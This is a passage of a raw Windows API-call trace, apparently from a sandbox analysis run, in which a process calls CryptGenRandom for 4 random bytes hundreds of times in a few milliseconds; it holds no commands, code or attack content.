pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 